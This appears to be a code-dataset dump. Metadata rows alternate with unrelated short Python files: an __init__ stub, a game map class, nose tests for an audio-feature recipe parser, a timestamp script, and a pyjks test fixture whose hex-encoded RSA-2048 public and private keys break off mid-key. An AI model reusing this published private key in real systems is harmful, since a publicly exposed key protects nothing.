| 0.193103
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
744c73982afb7700b93319a1589e8c024c0bf543
| 198
|
py
|
Python
|
src/labster/infrastructure/repositories/inmemory/__init__.py
|
jean3108/labandco
|
4317e7d3875f10d76076ad5fc68c1ba3c12badba
|
[
"Apache-2.0"
] | 2
|
2019-11-11T22:09:58.000Z
|
2020-01-20T19:44:30.000Z
|
src/labster/infrastructure/repositories/inmemory/__init__.py
|
jean3108/labandco
|
4317e7d3875f10d76076ad5fc68c1ba3c12badba
|
[
"Apache-2.0"
] | 15
|
2020-03-31T10:58:37.000Z
|
2022-01-22T09:14:49.000Z
|
src/labster/infrastructure/repositories/inmemory/__init__.py
|
jean3108/labandco
|
4317e7d3875f10d76076ad5fc68c1ba3c12badba
|
[
"Apache-2.0"
] | 2
|
2021-05-28T12:20:24.000Z
|
2021-09-08T11:27:57.000Z
|
# from __future__ import annotations
#
# from .profile_repository import InmemoryProfileRepository
# from .structure_repository import InmemoryStructureRepository
from __future__ import annotations
| 33
| 63
| 0.868687
| 18
| 198
| 9
| 0.5
| 0.123457
| 0.197531
| 0.333333
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.10101
| 198
| 5
| 64
| 39.6
| 0.910112
| 0.777778
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 0
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
77e052f8b073c4eb8e980c0f4fb54d4aea432c11
| 1,733
|
py
|
Python
|
old/Data/Map.py
|
emeric254/ISOT
|
51011da320eed6d9092e93e9ba4838ff84e62e86
|
[
"MIT"
] | 1
|
2015-01-13T16:23:20.000Z
|
2015-01-13T16:23:20.000Z
|
old/Data/Map.py
|
emeric254/ISOT
|
51011da320eed6d9092e93e9ba4838ff84e62e86
|
[
"MIT"
] | null | null | null |
old/Data/Map.py
|
emeric254/ISOT
|
51011da320eed6d9092e93e9ba4838ff84e62e86
|
[
"MIT"
] | null | null | null |
import Data.Utils
class Map:
"""Map """
def __init__(self):
"""Initialize"""
self.carte = [
[
[Data.Utils.load_image("cube.png", -1), Data.Utils.load_image("cube.png", -1), Data.Utils.load_image("cube.png", -1), Data.Utils.load_image("cube.png", -1)],
[Data.Utils.load_image("cube.png", -1), Data.Utils.load_image("cube.png", -1), Data.Utils.load_image("cube.png", -1), Data.Utils.load_image("cube.png", -1)],
[Data.Utils.load_image("cube.png", -1), Data.Utils.load_image("cube.png", -1), Data.Utils.load_image("cube.png", -1), Data.Utils.load_image("cube.png", -1)],
[Data.Utils.load_image("cube.png", -1), Data.Utils.load_image("cube.png", -1), Data.Utils.load_image("cube.png", -1), Data.Utils.load_image("cube.png", -1)]
],
[
[Data.Utils.load_image("cube.png", -1), 0, 0, Data.Utils.load_image("cube.png", -1)],
[],
[],
[Data.Utils.load_image("cube.png", -1)]
],
[
[Data.Utils.load_image("cube.png", -1), 0, 0, Data.Utils.load_image("cube.png", -1)],
[],
[],
[Data.Utils.load_image("cube.png", -1)]
],
[
[Data.Utils.load_image("cube.png", -1), Data.Utils.load_image("cube.png", -1), Data.Utils.load_image("cube.png", -1), Data.Utils.load_image("cube.png", -1)],
[Data.Utils.load_image("cube.png", -1)],
[Data.Utils.load_image("cube.png", -1)],
[Data.Utils.load_image("cube.png", -1)]
]
]
def __len__(self):
return len(self.carte)
| 46.837838
| 173
| 0.507213
| 226
| 1,733
| 3.725664
| 0.079646
| 0.320665
| 0.447743
| 0.619952
| 0.900238
| 0.900238
| 0.900238
| 0.900238
| 0.900238
| 0.900238
| 0
| 0.026549
| 0.282747
| 1,733
| 36
| 174
| 48.138889
| 0.650845
| 0.008656
| 0
| 0.580645
| 0
| 0
| 0.135911
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.064516
| false
| 0
| 0.032258
| 0.032258
| 0.16129
| 0
| 0
| 0
| 0
| null | 1
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 9
|
bb057347f8a3b12e9881e357c11f74ff4b9687af
| 3,014
|
py
|
Python
|
tests/utils/test_VectorRecipeParser.py
|
ankitshah009/dcase_util
|
738571ce78faf60b0fdfa1d59fd42f42c8944f3d
|
[
"MIT"
] | 122
|
2017-11-10T16:51:04.000Z
|
2022-03-28T07:04:34.000Z
|
tests/utils/test_VectorRecipeParser.py
|
gpinyero/dcase_util
|
298b2db13a2ffce7791f4de9d374616793564816
|
[
"MIT"
] | 18
|
2018-03-29T01:14:35.000Z
|
2022-03-30T11:21:17.000Z
|
tests/utils/test_VectorRecipeParser.py
|
gpinyero/dcase_util
|
298b2db13a2ffce7791f4de9d374616793564816
|
[
"MIT"
] | 39
|
2017-11-16T14:34:26.000Z
|
2022-03-27T06:27:52.000Z
|
""" Unit tests for VectorRecipeParser """
import nose.tools
from dcase_util.utils import VectorRecipeParser
def test_parse():
parser = VectorRecipeParser()
# Test #1
test_recipe = 'mel'
parsed_recipe = parser.parse(recipe=test_recipe)
# correct amount of items
nose.tools.eq_(len(parsed_recipe), 1)
# method is correct
nose.tools.eq_(parsed_recipe[0]['label'], 'mel')
# Test #2
test_recipe = 'mel=0;mfcc=1'
parsed_recipe = parser.parse(recipe=test_recipe)
# correct amount of items
nose.tools.eq_(len(parsed_recipe), 2)
# methods are correct
nose.tools.eq_(parsed_recipe[0]['label'], 'mel')
nose.tools.eq_(parsed_recipe[1]['label'], 'mfcc')
# vector-index is correct / channel
nose.tools.eq_(parsed_recipe[0]['vector-index']['stream'], 0)
nose.tools.eq_(parsed_recipe[1]['vector-index']['stream'], 1)
nose.tools.eq_(parsed_recipe[0]['vector-index']['full'], True)
nose.tools.eq_(parsed_recipe[1]['vector-index']['full'], True)
nose.tools.eq_(parsed_recipe[0]['vector-index']['selection'], False)
nose.tools.eq_(parsed_recipe[1]['vector-index']['selection'], False)
# Test #3
test_recipe = 'mel=1-20'
parsed_recipe = parser.parse(recipe=test_recipe)
# correct amount of items
nose.tools.eq_(len(parsed_recipe), 1)
# method is correct
nose.tools.eq_(parsed_recipe[0]['label'], 'mel')
# vector-index is correct / channel
nose.tools.eq_(parsed_recipe[0]['vector-index']['stream'], 0)
nose.tools.eq_(parsed_recipe[0]['vector-index']['full'], False)
nose.tools.eq_(parsed_recipe[0]['vector-index']['selection'], False)
nose.tools.eq_(parsed_recipe[0]['vector-index']['start'], 1)
nose.tools.eq_(parsed_recipe[0]['vector-index']['stop'], 21)
# Test #4
test_recipe = 'mel=1,2,4,5'
parsed_recipe = parser.parse(recipe=test_recipe)
# correct amount of items
nose.tools.eq_(len(parsed_recipe), 1)
# extractor is correct
nose.tools.eq_(parsed_recipe[0]['label'], 'mel')
# vector-index is correct / channel
nose.tools.eq_(parsed_recipe[0]['vector-index']['stream'], 0)
nose.tools.eq_(parsed_recipe[0]['vector-index']['full'], False)
nose.tools.eq_(parsed_recipe[0]['vector-index']['selection'], True)
nose.tools.assert_list_equal(parsed_recipe[0]['vector-index']['vector'], [1, 2, 4, 5])
# Test #5
test_recipe = 'mel=1:1-20'
parsed_recipe = parser.parse(recipe=test_recipe)
# correct amount of items
nose.tools.eq_(len(parsed_recipe), 1)
# method is correct
nose.tools.eq_(parsed_recipe[0]['label'], 'mel')
# vector-index is correct / channel
nose.tools.eq_(parsed_recipe[0]['vector-index']['stream'], 1)
nose.tools.eq_(parsed_recipe[0]['vector-index']['full'], False)
nose.tools.eq_(parsed_recipe[0]['vector-index']['selection'], False)
nose.tools.eq_(parsed_recipe[0]['vector-index']['start'], 1)
nose.tools.eq_(parsed_recipe[0]['vector-index']['stop'], 21)
| 33.865169
| 90
| 0.668547
| 433
| 3,014
| 4.468822
| 0.120092
| 0.223256
| 0.170543
| 0.219638
| 0.842377
| 0.829974
| 0.817571
| 0.817571
| 0.810336
| 0.766408
| 0
| 0.025088
| 0.153616
| 3,014
| 88
| 91
| 34.25
| 0.733438
| 0.139681
| 0
| 0.6
| 0
| 0
| 0.176356
| 0
| 0
| 0
| 0
| 0
| 0.022222
| 1
| 0.022222
| false
| 0
| 0.044444
| 0
| 0.066667
| 0
| 0
| 0
| 0
| null | 1
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
bb1b6b88309bc5b257921790116928044e5cf2f8
| 68
|
py
|
Python
|
tests-example/now.py
|
saada/tilt-example-nodejs
|
a2c58ea65dd40f50903bded3f22b9fd36a91bc15
|
[
"Apache-2.0"
] | 10
|
2021-03-30T12:36:46.000Z
|
2022-01-02T22:25:40.000Z
|
tests-example/now.py
|
saada/tilt-example-nodejs
|
a2c58ea65dd40f50903bded3f22b9fd36a91bc15
|
[
"Apache-2.0"
] | 3
|
2020-08-28T17:15:49.000Z
|
2021-06-10T22:10:53.000Z
|
tests-example/now.py
|
saada/tilt-example-nodejs
|
a2c58ea65dd40f50903bded3f22b9fd36a91bc15
|
[
"Apache-2.0"
] | 8
|
2020-08-15T03:10:52.000Z
|
2021-09-15T10:53:16.000Z
|
import time
print("%d" % (float(time.time()) * 1000 * 1000 * 1000))
| 22.666667
| 55
| 0.602941
| 10
| 68
| 4.1
| 0.6
| 0.390244
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.210526
| 0.161765
| 68
| 3
| 55
| 22.666667
| 0.508772
| 0
| 0
| 0
| 0
| 0
| 0.028986
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 0.5
| 0
| 0.5
| 0.5
| 1
| 0
| 0
| null | 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 0
| 1
|
0
| 7
|
bb4d8e87cff8a60a7cef20e90f630478125e1e6b
| 22,329
|
py
|
Python
|
tests/expected/RSA2048_3certs.py
|
castrapel/pyjks
|
f32dd209437f748949053be70f57ab1e80b5a7e3
|
[
"MIT"
] | 92
|
2016-10-03T07:54:39.000Z
|
2022-03-29T00:38:45.000Z
|
tests/expected/RSA2048_3certs.py
|
castrapel/pyjks
|
f32dd209437f748949053be70f57ab1e80b5a7e3
|
[
"MIT"
] | 46
|
2016-09-09T03:13:40.000Z
|
2022-03-10T22:54:12.000Z
|
tests/expected/RSA2048_3certs.py
|
castrapel/pyjks
|
f32dd209437f748949053be70f57ab1e80b5a7e3
|
[
"MIT"
] | 30
|
2016-10-07T16:12:11.000Z
|
2022-02-04T21:34:03.000Z
|
public_key = b"\x30\x82\x01\x22\x30\x0d\x06\x09\x2a\x86\x48\x86\xf7\x0d\x01\x01\x01\x05\x00\x03\x82\x01\x0f\x00\x30\x82\x01\x0a\x02\x82\x01\x01" + \
b"\x00\xc0\x86\x99\x9a\x76\x74\x9a\xf5\x04\xb8\x48\xf0\x7e\x67\xc3\x90\x51\x17\xe6\xcd\xb3\x97\x6b\x41\xbc\x4e\x4e\x0c\x30\xff\x57" + \
b"\xf1\x47\x99\xd5\xc3\x2a\x67\x26\x6c\x28\x1e\x18\x03\x0f\xaf\xd2\x70\xd2\xb2\xab\xae\x44\x7a\x1c\xcd\xce\x6f\xcb\xfb\x56\x96\x1b" + \
b"\x12\x52\x11\x43\x01\x26\x07\x4c\xf9\x3e\x51\x6b\xd3\x9a\x7d\xd8\x26\x92\xa1\xab\x5a\x6e\x2f\x66\x61\x31\x62\x23\x0f\x8b\x0a\x6a" + \
b"\x17\xe7\xd0\x0a\xc1\x69\x8a\x60\xcf\xba\x6c\x30\x33\x88\x2c\xaf\x13\x9a\xa6\x49\x83\x74\xb4\xdf\x23\xad\xe4\x01\x21\x52\x51\xfe" + \
b"\xcc\x4f\x4e\x3e\xd1\xa8\xce\x92\xc0\x34\x0e\x1d\x6c\xa7\x4d\x6f\x7d\xd7\x65\xb8\xf4\x50\xa1\x58\xa6\x8a\xae\x9e\x21\x50\x84\x01" + \
b"\x38\x1d\x85\x6e\xcb\x7d\xc9\xb5\x6b\xda\x94\xe5\x1c\xa8\xf5\x15\x5e\x8f\xbc\x95\xe0\x76\xcb\x0d\x7e\x79\x11\x0c\x81\xd2\x60\xf1" + \
b"\xaf\x84\xcc\xa0\x3b\x06\xe8\xa2\x42\x9f\xb3\xd4\x94\x8e\xd0\xbc\xe8\x7e\xfa\x01\x6b\x0d\xd0\x16\x60\x47\x86\x9c\xb9\x7f\x12\xd9" + \
b"\x21\x5c\xf7\x8e\x35\x7e\x85\x18\xfa\xc8\x86\xed\xbe\xb3\x0e\x4a\x56\xd7\xd6\x92\x3d\x23\x3c\xbc\xcc\xef\x3a\x33\xd8\x48\xd8\xca" + \
b"\x55\x02\x03\x01\x00\x01"
raw_private_key = b"\x30\x82\x04\xa3\x02\x01\x00\x02\x82\x01\x01\x00\xc0\x86\x99\x9a\x76\x74\x9a\xf5\x04\xb8\x48\xf0\x7e\x67\xc3\x90\x51\x17\xe6\xcd" + \
b"\xb3\x97\x6b\x41\xbc\x4e\x4e\x0c\x30\xff\x57\xf1\x47\x99\xd5\xc3\x2a\x67\x26\x6c\x28\x1e\x18\x03\x0f\xaf\xd2\x70\xd2\xb2\xab\xae" + \
b"\x44\x7a\x1c\xcd\xce\x6f\xcb\xfb\x56\x96\x1b\x12\x52\x11\x43\x01\x26\x07\x4c\xf9\x3e\x51\x6b\xd3\x9a\x7d\xd8\x26\x92\xa1\xab\x5a" + \
b"\x6e\x2f\x66\x61\x31\x62\x23\x0f\x8b\x0a\x6a\x17\xe7\xd0\x0a\xc1\x69\x8a\x60\xcf\xba\x6c\x30\x33\x88\x2c\xaf\x13\x9a\xa6\x49\x83" + \
b"\x74\xb4\xdf\x23\xad\xe4\x01\x21\x52\x51\xfe\xcc\x4f\x4e\x3e\xd1\xa8\xce\x92\xc0\x34\x0e\x1d\x6c\xa7\x4d\x6f\x7d\xd7\x65\xb8\xf4" + \
b"\x50\xa1\x58\xa6\x8a\xae\x9e\x21\x50\x84\x01\x38\x1d\x85\x6e\xcb\x7d\xc9\xb5\x6b\xda\x94\xe5\x1c\xa8\xf5\x15\x5e\x8f\xbc\x95\xe0" + \
b"\x76\xcb\x0d\x7e\x79\x11\x0c\x81\xd2\x60\xf1\xaf\x84\xcc\xa0\x3b\x06\xe8\xa2\x42\x9f\xb3\xd4\x94\x8e\xd0\xbc\xe8\x7e\xfa\x01\x6b" + \
b"\x0d\xd0\x16\x60\x47\x86\x9c\xb9\x7f\x12\xd9\x21\x5c\xf7\x8e\x35\x7e\x85\x18\xfa\xc8\x86\xed\xbe\xb3\x0e\x4a\x56\xd7\xd6\x92\x3d" + \
b"\x23\x3c\xbc\xcc\xef\x3a\x33\xd8\x48\xd8\xca\x55\x02\x03\x01\x00\x01\x02\x82\x01\x00\x72\xd6\xd7\x00\xdf\xef\xa6\x0e\xc9\x05\xf3" + \
b"\xdc\x20\x4a\x5c\xc8\xd4\xd6\x61\x02\x0a\x42\x23\xe4\x4e\x22\x97\x43\x86\x66\x89\x5a\x8e\xcf\x20\x47\x0e\x20\x01\x37\x3a\xa6\xd8" + \
b"\xc3\xda\xb3\x91\xdf\x62\x8e\xd9\x01\x56\x2f\x50\xc7\x22\x80\x65\x38\x42\xe9\xbe\xb4\x2a\xe7\xc9\x04\x02\x5f\x10\x77\x0b\xc9\x1d" + \
b"\x7c\x57\x07\x01\xcb\xe0\x63\x37\x06\xf5\xfa\xa8\x23\x09\x85\xf4\x4b\xed\x30\x05\x20\xc5\x51\xbf\x58\xa7\x4f\xb7\x77\xb1\x47\x9f" + \
b"\x68\xdd\xad\x69\xb1\x53\xea\x24\xa7\x99\x11\xda\x98\x39\xbd\x6b\x3f\x29\x0f\x67\xe0\x04\x6d\x58\x02\xd2\x96\xd9\x2f\x88\x40\xbe" + \
b"\x4b\x3e\x82\x81\xff\xa5\x1f\xf8\x76\x43\x8f\x31\x84\xbf\xc9\xd2\x3f\xa6\xc2\x74\x8a\x93\x61\xd1\x00\x06\x28\xee\x29\xb9\x14\x2c" + \
b"\x6f\xb3\xed\xe0\xb3\xff\x54\x5e\x0d\x7c\x91\xcb\xae\x8b\xf2\x7f\x41\x47\x72\x89\xcc\xa8\x19\x7f\x0c\x24\x76\xbd\xde\x07\x09\xff" + \
b"\x7f\xf7\xb8\x97\x7d\x76\xc1\xf4\xff\x87\xda\x0a\x57\xcc\x92\x0d\xc2\x06\x5e\xa1\xb8\x24\x84\x0a\x73\x6b\x15\xa6\x0f\xb8\x09\x5a" + \
b"\x81\x0f\x21\x50\x52\x66\xcd\x78\xab\xfa\x14\xb7\xd8\x51\x3f\xce\x46\x8a\x27\x9a\x81\x02\x81\x81\x00\xf7\xb2\x3c\x6f\x9c\xae\xa2" + \
b"\x75\x95\xbb\xae\xd2\x78\xad\xc3\xb6\x44\x18\xad\x92\x01\xc5\xdd\x6f\x33\x04\x2a\x4f\x00\xb9\x3f\x18\xf4\x39\xe3\xc7\x08\x58\xc7" + \
b"\x9f\x35\x31\x13\x56\x88\x33\xc5\x5d\xeb\x6d\x8c\xdf\x1d\x45\x8b\xdb\xf8\x09\x25\x4a\x80\x32\xec\xef\xc0\x24\x56\xf7\xd3\x2a\x6e" + \
b"\xd0\x2e\x73\x07\xb5\xb6\x37\x67\x10\x28\xfa\xfc\xb1\xef\x59\xed\xfc\x79\x4d\xd4\xa5\x4f\xb3\xf2\x15\xfb\x26\x0a\xa8\x2a\xdd\x40" + \
b"\x0d\xf6\xdb\xb4\x8b\x47\x60\xec\x4c\xa6\xe5\x15\x1f\x2b\x70\xa5\xbf\xfc\x54\xae\x9d\x91\xfd\x01\x7d\x02\x81\x81\x00\xc6\xfa\xe2" + \
b"\x22\xe6\xbb\xed\xd6\xfc\x69\x48\x83\xf0\x08\x86\x55\x58\xae\x0f\x16\xc9\xef\xb2\x4d\xc8\x5d\x4b\xc2\xa4\x05\x26\x92\x42\xce\x5b" + \
b"\x40\xa8\xd4\x26\xe9\x98\x98\x32\xe0\xd1\x60\x05\x84\xd8\x89\xd5\x42\x3e\x27\x20\x22\xdc\x2e\x6a\x1c\xb0\x88\xb2\x37\x12\x7e\x61" + \
b"\x60\x84\x60\x97\xa2\xec\x35\xe2\xfd\xf8\x6b\xf8\xae\xfc\x70\xc8\x84\xa5\x46\x63\xff\x2c\x46\x48\x61\x2b\x91\x75\x21\xd0\xf6\x02" + \
b"\x7e\xa5\xd2\x39\x06\x30\x17\xea\x1a\x7f\xb3\x57\xe2\xcc\xda\xc1\x58\x34\xee\x50\x54\xd8\x8b\x41\xc3\x4a\x4b\x43\xb9\x02\x81\x81" + \
b"\x00\xae\x6a\x6f\x6c\x18\x64\x50\x39\x84\x4a\x38\x7c\x34\x46\x07\x7e\x1c\xcd\x53\xcb\x70\x3c\x28\x04\xd9\x63\xa1\x77\x28\x07\x49" + \
b"\x8b\x04\xce\x8e\xb9\xe4\x02\xbf\xee\x37\xc2\x6a\xdf\x8f\xe1\x04\xa5\x71\xd6\x1e\x50\x2d\x88\x7f\x47\x51\x8c\xff\x19\x4a\xd4\x91" + \
b"\x4a\xf1\x7d\xa5\x4f\xb4\xfe\x38\x31\x97\xc3\xa0\x36\x30\x2d\x2b\x01\x92\x19\xca\x3e\x71\x50\x5d\xe8\x5e\x72\x93\xbe\x24\x35\x8d" + \
b"\xce\x34\x9f\x40\xf9\xd1\xd5\x21\xf9\xb3\x4e\x59\xff\x89\x2f\x92\xb5\x17\x00\x50\xb3\x36\x1f\x88\x57\x7c\x13\x15\x32\x17\x4e\x94" + \
b"\xf1\x02\x81\x80\x59\xcd\x9d\x05\xf7\x70\xd5\xb4\xf3\x92\x68\xc1\xf3\x31\x45\xbf\x7b\x18\x83\x82\xdb\x7c\xac\xd2\x62\x1d\x89\x35" + \
b"\xbd\x64\xfd\xb5\x81\x25\x35\x16\x07\x9c\x48\x3b\xa1\x3c\xff\xa9\x6b\x95\x94\xa8\x12\x3a\x92\xdf\x24\xc1\xef\xc5\x0b\xee\x7e\xc1" + \
b"\x98\x02\xf9\xbb\xd5\x42\xe8\x9b\xf0\xe2\xcf\x4d\x1e\xa2\x6b\x62\x08\x1e\x62\xcc\x46\xee\x77\xf1\x35\xce\x81\x0f\x07\x62\x69\x04" + \
b"\x41\xef\x92\x17\xc3\x01\x64\xba\xd8\x07\xfa\xe8\x8a\x08\x21\x05\xf8\xa0\x6e\x87\xd3\xc0\xdf\x05\xfa\x4d\x9c\x3f\xce\xc3\x7a\xd8" + \
b"\xb2\xcd\x29\x31\x02\x81\x80\x59\x7c\x94\xf2\x28\x9c\x8c\x24\x1c\xc3\x84\xac\xf6\x49\xf6\xc7\xb1\x98\x66\xf5\x6c\x59\x31\xe5\x30" + \
b"\xb2\xc1\xc0\xcc\x15\x94\x4d\x5a\xa0\x5c\xcb\x30\x46\xaa\xdc\x25\x60\xe2\x64\x5f\x1e\x35\xc3\x82\x3c\x47\x06\xc7\x4f\x39\xcc\x4f" + \
b"\xda\xf7\xf5\x28\x30\xde\x9a\xa3\xb9\xf6\xa4\x4a\x43\xff\x9e\x1a\x01\xcb\x03\x51\x37\xd4\xb8\xea\xab\xd5\xb6\x36\xf9\x76\x1e\x08" + \
b"\x9e\xcd\x58\x71\x8b\x6d\xa6\xf4\x43\xa3\x63\xf8\xd5\x72\xc1\x4b\x76\x78\x03\x15\x8d\xbf\xb3\x1f\x63\x3f\x99\xec\xfb\xd1\x5d\x09" + \
b"\x1d\xa6\xe6\xd0\xc6\x3c\xf9"
private_key = b"\x30\x82\x04\xbd\x02\x01\x00\x30\x0d\x06\x09\x2a\x86\x48\x86\xf7\x0d\x01\x01\x01\x05\x00\x04\x82\x04\xa7\x30\x82\x04\xa3\x02\x01" + \
b"\x00\x02\x82\x01\x01\x00\xc0\x86\x99\x9a\x76\x74\x9a\xf5\x04\xb8\x48\xf0\x7e\x67\xc3\x90\x51\x17\xe6\xcd\xb3\x97\x6b\x41\xbc\x4e" + \
b"\x4e\x0c\x30\xff\x57\xf1\x47\x99\xd5\xc3\x2a\x67\x26\x6c\x28\x1e\x18\x03\x0f\xaf\xd2\x70\xd2\xb2\xab\xae\x44\x7a\x1c\xcd\xce\x6f" + \
b"\xcb\xfb\x56\x96\x1b\x12\x52\x11\x43\x01\x26\x07\x4c\xf9\x3e\x51\x6b\xd3\x9a\x7d\xd8\x26\x92\xa1\xab\x5a\x6e\x2f\x66\x61\x31\x62" + \
b"\x23\x0f\x8b\x0a\x6a\x17\xe7\xd0\x0a\xc1\x69\x8a\x60\xcf\xba\x6c\x30\x33\x88\x2c\xaf\x13\x9a\xa6\x49\x83\x74\xb4\xdf\x23\xad\xe4" + \
b"\x01\x21\x52\x51\xfe\xcc\x4f\x4e\x3e\xd1\xa8\xce\x92\xc0\x34\x0e\x1d\x6c\xa7\x4d\x6f\x7d\xd7\x65\xb8\xf4\x50\xa1\x58\xa6\x8a\xae" + \
b"\x9e\x21\x50\x84\x01\x38\x1d\x85\x6e\xcb\x7d\xc9\xb5\x6b\xda\x94\xe5\x1c\xa8\xf5\x15\x5e\x8f\xbc\x95\xe0\x76\xcb\x0d\x7e\x79\x11" + \
b"\x0c\x81\xd2\x60\xf1\xaf\x84\xcc\xa0\x3b\x06\xe8\xa2\x42\x9f\xb3\xd4\x94\x8e\xd0\xbc\xe8\x7e\xfa\x01\x6b\x0d\xd0\x16\x60\x47\x86" + \
b"\x9c\xb9\x7f\x12\xd9\x21\x5c\xf7\x8e\x35\x7e\x85\x18\xfa\xc8\x86\xed\xbe\xb3\x0e\x4a\x56\xd7\xd6\x92\x3d\x23\x3c\xbc\xcc\xef\x3a" + \
b"\x33\xd8\x48\xd8\xca\x55\x02\x03\x01\x00\x01\x02\x82\x01\x00\x72\xd6\xd7\x00\xdf\xef\xa6\x0e\xc9\x05\xf3\xdc\x20\x4a\x5c\xc8\xd4" + \
b"\xd6\x61\x02\x0a\x42\x23\xe4\x4e\x22\x97\x43\x86\x66\x89\x5a\x8e\xcf\x20\x47\x0e\x20\x01\x37\x3a\xa6\xd8\xc3\xda\xb3\x91\xdf\x62" + \
b"\x8e\xd9\x01\x56\x2f\x50\xc7\x22\x80\x65\x38\x42\xe9\xbe\xb4\x2a\xe7\xc9\x04\x02\x5f\x10\x77\x0b\xc9\x1d\x7c\x57\x07\x01\xcb\xe0" + \
b"\x63\x37\x06\xf5\xfa\xa8\x23\x09\x85\xf4\x4b\xed\x30\x05\x20\xc5\x51\xbf\x58\xa7\x4f\xb7\x77\xb1\x47\x9f\x68\xdd\xad\x69\xb1\x53" + \
b"\xea\x24\xa7\x99\x11\xda\x98\x39\xbd\x6b\x3f\x29\x0f\x67\xe0\x04\x6d\x58\x02\xd2\x96\xd9\x2f\x88\x40\xbe\x4b\x3e\x82\x81\xff\xa5" + \
b"\x1f\xf8\x76\x43\x8f\x31\x84\xbf\xc9\xd2\x3f\xa6\xc2\x74\x8a\x93\x61\xd1\x00\x06\x28\xee\x29\xb9\x14\x2c\x6f\xb3\xed\xe0\xb3\xff" + \
b"\x54\x5e\x0d\x7c\x91\xcb\xae\x8b\xf2\x7f\x41\x47\x72\x89\xcc\xa8\x19\x7f\x0c\x24\x76\xbd\xde\x07\x09\xff\x7f\xf7\xb8\x97\x7d\x76" + \
b"\xc1\xf4\xff\x87\xda\x0a\x57\xcc\x92\x0d\xc2\x06\x5e\xa1\xb8\x24\x84\x0a\x73\x6b\x15\xa6\x0f\xb8\x09\x5a\x81\x0f\x21\x50\x52\x66" + \
b"\xcd\x78\xab\xfa\x14\xb7\xd8\x51\x3f\xce\x46\x8a\x27\x9a\x81\x02\x81\x81\x00\xf7\xb2\x3c\x6f\x9c\xae\xa2\x75\x95\xbb\xae\xd2\x78" + \
b"\xad\xc3\xb6\x44\x18\xad\x92\x01\xc5\xdd\x6f\x33\x04\x2a\x4f\x00\xb9\x3f\x18\xf4\x39\xe3\xc7\x08\x58\xc7\x9f\x35\x31\x13\x56\x88" + \
b"\x33\xc5\x5d\xeb\x6d\x8c\xdf\x1d\x45\x8b\xdb\xf8\x09\x25\x4a\x80\x32\xec\xef\xc0\x24\x56\xf7\xd3\x2a\x6e\xd0\x2e\x73\x07\xb5\xb6" + \
b"\x37\x67\x10\x28\xfa\xfc\xb1\xef\x59\xed\xfc\x79\x4d\xd4\xa5\x4f\xb3\xf2\x15\xfb\x26\x0a\xa8\x2a\xdd\x40\x0d\xf6\xdb\xb4\x8b\x47" + \
b"\x60\xec\x4c\xa6\xe5\x15\x1f\x2b\x70\xa5\xbf\xfc\x54\xae\x9d\x91\xfd\x01\x7d\x02\x81\x81\x00\xc6\xfa\xe2\x22\xe6\xbb\xed\xd6\xfc" + \
b"\x69\x48\x83\xf0\x08\x86\x55\x58\xae\x0f\x16\xc9\xef\xb2\x4d\xc8\x5d\x4b\xc2\xa4\x05\x26\x92\x42\xce\x5b\x40\xa8\xd4\x26\xe9\x98" + \
b"\x98\x32\xe0\xd1\x60\x05\x84\xd8\x89\xd5\x42\x3e\x27\x20\x22\xdc\x2e\x6a\x1c\xb0\x88\xb2\x37\x12\x7e\x61\x60\x84\x60\x97\xa2\xec" + \
b"\x35\xe2\xfd\xf8\x6b\xf8\xae\xfc\x70\xc8\x84\xa5\x46\x63\xff\x2c\x46\x48\x61\x2b\x91\x75\x21\xd0\xf6\x02\x7e\xa5\xd2\x39\x06\x30" + \
b"\x17\xea\x1a\x7f\xb3\x57\xe2\xcc\xda\xc1\x58\x34\xee\x50\x54\xd8\x8b\x41\xc3\x4a\x4b\x43\xb9\x02\x81\x81\x00\xae\x6a\x6f\x6c\x18" + \
b"\x64\x50\x39\x84\x4a\x38\x7c\x34\x46\x07\x7e\x1c\xcd\x53\xcb\x70\x3c\x28\x04\xd9\x63\xa1\x77\x28\x07\x49\x8b\x04\xce\x8e\xb9\xe4" + \
b"\x02\xbf\xee\x37\xc2\x6a\xdf\x8f\xe1\x04\xa5\x71\xd6\x1e\x50\x2d\x88\x7f\x47\x51\x8c\xff\x19\x4a\xd4\x91\x4a\xf1\x7d\xa5\x4f\xb4" + \
b"\xfe\x38\x31\x97\xc3\xa0\x36\x30\x2d\x2b\x01\x92\x19\xca\x3e\x71\x50\x5d\xe8\x5e\x72\x93\xbe\x24\x35\x8d\xce\x34\x9f\x40\xf9\xd1" + \
b"\xd5\x21\xf9\xb3\x4e\x59\xff\x89\x2f\x92\xb5\x17\x00\x50\xb3\x36\x1f\x88\x57\x7c\x13\x15\x32\x17\x4e\x94\xf1\x02\x81\x80\x59\xcd" + \
